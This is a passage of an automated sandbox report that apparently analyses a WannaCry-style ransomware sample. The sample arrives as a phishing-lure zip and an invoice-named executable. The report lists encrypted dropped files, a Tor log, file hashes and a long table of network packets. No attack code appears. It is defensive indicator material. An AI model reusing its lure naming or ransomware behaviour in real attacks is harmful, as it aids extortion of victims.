                                                          SHA1:F2BC6658379F3127045DD491C1D5352430762165
                                                          SHA-256:631167DFFA29E5DE97CF6C26F1226F622E8D318E4723DCC40474F5793B247501
                                                          SHA-512:DDCF800682C9CA5DAE005E1232E924A9E1DA3D1A2EC516F4AF3B8FDB59517F187A0C54CFE53582F047F96E7783EA22586EFB6ABDD7DD6004695BBB50F4EC03F5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....#3.z5...v.[Y..V.BEc...x.....&*q.9>X.........`.P.Ml.C..6g S..Iq..;..1.cuN.v.......T...MQ.y]..Z.y."5.K_.h...,{...";.Z^...=}9Y..r..v.e.yE.%.z!...|H.e..M.[.P.bKQ.?h.G.a3....S.V.4...#....<~...Q`....`.+...V...F.W.hp...9V...(.o"..V.{.S.w.}<X.....6.*m............9..NP.E...........%.........z..b%E.<..... .TU..w3.Y..L...s.z. 3.....2.g(..nn?..a.@.*d.b.79\E..H60.<L...5...\.<....@.F. +..'..1..]...x.r..~..l.....6d..w.....N.D.v.`b>\&.}.{.*....`.{...g.x....$..'...T....`>;..>.m.U......^w..D..cTUK......}........4t..S.%h.6....X..(}9......u..D..(.'m...V.V.!.%..Ew)..7E8.4\t!t...B......=f<.. ....b.....B~.!9a.........7i..2.j..N....g. aw.]......lw..Z.3.z..`..../.j...1=,.6.E..!M..>tA.V...Jl.pq..........4..\].-mB..N.v..lc....s..U.>..s.m.i.E...X.P..y[...w.;..._.=o..&E.p.i.4.+D...=#R...L....b.....5.(ux..4...Iv.P..j......(..O'..dT...\....r_.<......s....|...`...t......M..(........R9\M...{.P.+.c.9...6.5p.5...'..+..\G...]......oL<V..7.7...gU....o....?|3...y U

                                                          C:\Users\user\Downloads\WSHEJMDVQC.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834077587763993
                                                          Encrypted:false
                                                          SSDEEP:24:bkf+zD3RoCmO4K2g4a02X93j6+rUZJ00L/lxD8B+FaX4PlopN7269Sj:bkiTRoCmJBablj6+r+F/l18BjPpN7Bkj
                                                          MD5:C22FDB40A47E41B5B1F21C0C05DA97CE
                                                          SHA1:F2BC6658379F3127045DD491C1D5352430762165
                                                          SHA-256:631167DFFA29E5DE97CF6C26F1226F622E8D318E4723DCC40474F5793B247501
                                                          SHA-512:DDCF800682C9CA5DAE005E1232E924A9E1DA3D1A2EC516F4AF3B8FDB59517F187A0C54CFE53582F047F96E7783EA22586EFB6ABDD7DD6004695BBB50F4EC03F5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....#3.z5...v.[Y..V.BEc...x.....&*q.9>X.........`.P.Ml.C..6g S..Iq..;..1.cuN.v.......T...MQ.y]..Z.y."5.K_.h...,{...";.Z^...=}9Y..r..v.e.yE.%.z!...|H.e..M.[.P.bKQ.?h.G.a3....S.V.4...#....<~...Q`....`.+...V...F.W.hp...9V...(.o"..V.{.S.w.}<X.....6.*m............9..NP.E...........%.........z..b%E.<..... .TU..w3.Y..L...s.z. 3.....2.g(..nn?..a.@.*d.b.79\E..H60.<L...5...\.<....@.F. +..'..1..]...x.r..~..l.....6d..w.....N.D.v.`b>\&.}.{.*....`.{...g.x....$..'...T....`>;..>.m.U......^w..D..cTUK......}........4t..S.%h.6....X..(}9......u..D..(.'m...V.V.!.%..Ew)..7E8.4\t!t...B......=f<.. ....b.....B~.!9a.........7i..2.j..N....g. aw.]......lw..Z.3.z..`..../.j...1=,.6.E..!M..>tA.V...Jl.pq..........4..\].-mB..N.v..lc....s..U.>..s.m.i.E...X.P..y[...w.;..._.=o..&E.p.i.4.+D...=#R...L....b.....5.(ux..4...Iv.P..j......(..O'..dT...\....r_.<......s....|...`...t......M..(........R9\M...{.P.+.c.9...6.5p.5...'..+..\G...]......oL<V..7.7...gU....o....?|3...y U

                                                          \Device\ConDrv

                                                          Download File
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2321
                                                          Entropy (8bit):5.0572825471537115
                                                          Encrypted:false
                                                          SSDEEP:48:1vKpfYxmD9mgYU+JkAcS5AFij0F7Fm8b4pc8qQD2USEI28k/jwj:YhYuSVqQd5aj
                                                          MD5:DD283A3B632CE60BC45465AEA6DC75E9
                                                          SHA1:377D22F66984CAF855008E44883E17949FCE6213
                                                          SHA-256:CB51C7EA98EF1B9E62DA1D0712003A923959CE3F7354844C83E1801FA4C351C5
                                                          SHA-512:A609D8353332396FB88265B326EABF3783CF96B95B3B6B3C372ED69DEE6FED5525DC7215388D06F3EA02BBAD3E46784CECA5F52461A219B2CB0E8FEFCF1B8138
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Jan 16 11:59:43.329 [notice] Tor 0.2.9.10 (git-1f6c8eda0073f464) running on Windows 8 with Libevent 2.0.22-stable, OpenSSL 1.0.2k and Zlib 1.2.8...Jan 16 11:59:43.345 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning..Jan 16 11:59:43.536 [notice] Configuration file "C:\Users\user\AppData\Roaming\tor\torrc" not present, using reasonable defaults...Jan 16 11:59:43.551 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\Users\user\Desktop\<default>. Is this what you wanted?..Jan 16 11:59:43.551 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\Users\user\Desktop\<default>. Is this what you wanted?..Jan 16 11:59:43.551 [notice] Opening Socks listener on 127.0.0.1:9050..Jan 16 11:59:43.000 [notice] Bootstrapped 0%: Starting..Jan 16 11:59:45.000 [notice] Bootstrapped 5%: Connecting to directory server..Jan 16 11:59:45.000 [notice] Bootstrapped 10%: Finishing handshake wit

                                                          Static File Info

                                                          General

                                                          File type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                          Entropy (8bit):7.999950924288556
                                                          TrID:
                                                          • ZIP compressed archive (8000/1) 99.91%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                          File name:Request for Quotation (RFQ_196).zip.zip
                                                          File size:3'482'858 bytes
                                                          MD5:2747028c2334ea64ada17b371c9eb469
                                                          SHA1:ba52213356b615f2fd08d69191b325d0abe7f8f6
                                                          SHA256:f905bfd1b61ce94eb6d9d5d69157583416b6fc79dd5e4507e98fee7f537b19a0
                                                          SHA512:91762e266301ec325f8db1722318a396389d5c28a27a96a942d7e48e9350473e9931d4c1b9a88448d2e1be631d1c149d95f295e4732cdd251389e9c63adf0fc9
                                                          SSDEEP:98304:4LmONDhOs46W0Nca3gpC62ZNMrla0Iy/F8mU:h+MJ9pHdIyt8T
                                                          TLSH:F9F53327D0562DA1E0FC6C4AAE38CBD4F9536117123F6B47869B1B21A603B478EFF119
                                                          File Content Preview:PK..3...c..K0X............#...Request for Quotation (RFQ_196).zip......AE...t,.2.]K<L..JW..Od'....W....K......%V.....I...+.B...W4m...>T....9)...+..c.yXv.R........@...1.............q..Oz.\...q5.(..I.@w.0y\...^Y.fg)... .>U..e..b...W.5........n.5..Z.?...mV..

                                                          File Icon

                                                          Icon Hash:1c1c1e4e4ececedc

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 16, 2024 11:59:46.771377087 CET49728443192.168.2.1680.127.137.19
                                                          Jan 16, 2024 11:59:46.771476030 CET4434972880.127.137.19192.168.2.16
                                                          Jan 16, 2024 11:59:46.771791935 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:46.771842003 CET49728443192.168.2.1680.127.137.19
                                                          Jan 16, 2024 11:59:46.806499004 CET49728443192.168.2.1680.127.137.19
                                                          Jan 16, 2024 11:59:46.806535959 CET4434972880.127.137.19192.168.2.16
                                                          Jan 16, 2024 11:59:46.965734959 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:46.965898037 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:46.967421055 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:47.162846088 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:47.166140079 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:47.360215902 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:47.361183882 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:47.555062056 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:47.555075884 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:47.555239916 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:47.640111923 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:47.834367990 CET49730443192.168.2.1678.142.142.246
                                                          Jan 16, 2024 11:59:47.834466934 CET4434973078.142.142.246192.168.2.16
                                                          Jan 16, 2024 11:59:47.834564924 CET49730443192.168.2.1678.142.142.246
                                                          Jan 16, 2024 11:59:47.835032940 CET49730443192.168.2.1678.142.142.246
                                                          Jan 16, 2024 11:59:47.835071087 CET4434973078.142.142.246192.168.2.16
                                                          Jan 16, 2024 11:59:47.836647987 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:47.840543032 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.034579039 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.036921978 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.036998987 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037019968 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037050962 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.037086964 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037143946 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037178993 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.037205935 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037250042 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037273884 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.037314892 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037336111 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.037362099 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037421942 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037432909 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.037457943 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037513971 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.037540913 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.214138985 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.230957031 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.230976105 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.230988979 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.230999947 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231013060 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231024981 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231024981 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.231040955 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231053114 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231065035 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231076002 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231086016 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.231086016 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.231087923 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231103897 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231115103 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.231142998 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231149912 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.231158972 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231298923 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.231389046 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231404066 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231415987 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231426954 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231442928 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231446028 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231458902 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231458902 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.231472015 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.231492996 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.231492996 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.231504917 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.235831022 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.408116102 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.408143997 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.408215046 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.408215046 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.424607992 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424622059 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424695969 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.424695969 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.424814939 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424837112 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424849033 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424860954 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424874067 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424887896 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424899101 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424901962 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.424901962 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.424911976 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424921989 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.424928904 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424941063 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424949884 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.424969912 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.424978971 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.424987078 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425004959 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425045013 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425071955 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425111055 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425124884 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425137043 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425179958 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425184965 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425184965 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425211906 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425247908 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425287962 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425287962 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425296068 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425319910 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425335884 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425343037 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425359011 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425395012 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425399065 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425410032 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425426960 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425446033 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425478935 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425482035 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425540924 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425585985 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425599098 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425610065 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425611019 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425632954 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425635099 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425663948 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425668955 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425694942 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425720930 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425720930 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425740957 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425781965 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425781965 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425853014 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425903082 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425934076 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425946951 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425957918 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425976038 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425976038 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.426002026 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.426052094 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.426052094 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.427084923 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.469156027 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.516190052 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.602001905 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.602030993 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.602050066 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.602089882 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.602111101 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.602111101 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.602154016 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618581057 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618607998 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618621111 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618643999 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618648052 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618666887 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618701935 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618715048 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618729115 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618751049 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618751049 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618771076 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618773937 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618777990 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618827105 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618838072 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618861914 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618906021 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618937969 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618949890 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618949890 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618967056 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619014978 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619014978 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619023085 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619036913 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619071007 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619082928 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619132042 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619134903 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619134903 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619144917 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619157076 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619179964 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619191885 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619198084 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619198084 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619251966 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619265079 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619277000 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619298935 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619299889 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619299889 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619317055 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619318962 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619347095 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619374037 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619374037 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619388103 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619394064 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619410038 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619421005 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619452000 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619473934 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619473934 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619481087 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619527102 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619527102 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619558096 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619574070 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619585991 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619607925 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619649887 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619651079 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619654894 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619673967 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619685888 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619698048 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619723082 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619725943 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619725943 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619765997 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619820118 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619834900 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619883060 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619883060 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619898081 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619919062 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619930983 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619945049 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619945049 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619972944 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619973898 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619973898 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620028019 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620076895 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620076895 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620080948 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620095968 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620117903 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620165110 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620165110 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620327950 CET8049729171.25.193.9192.168.2.16
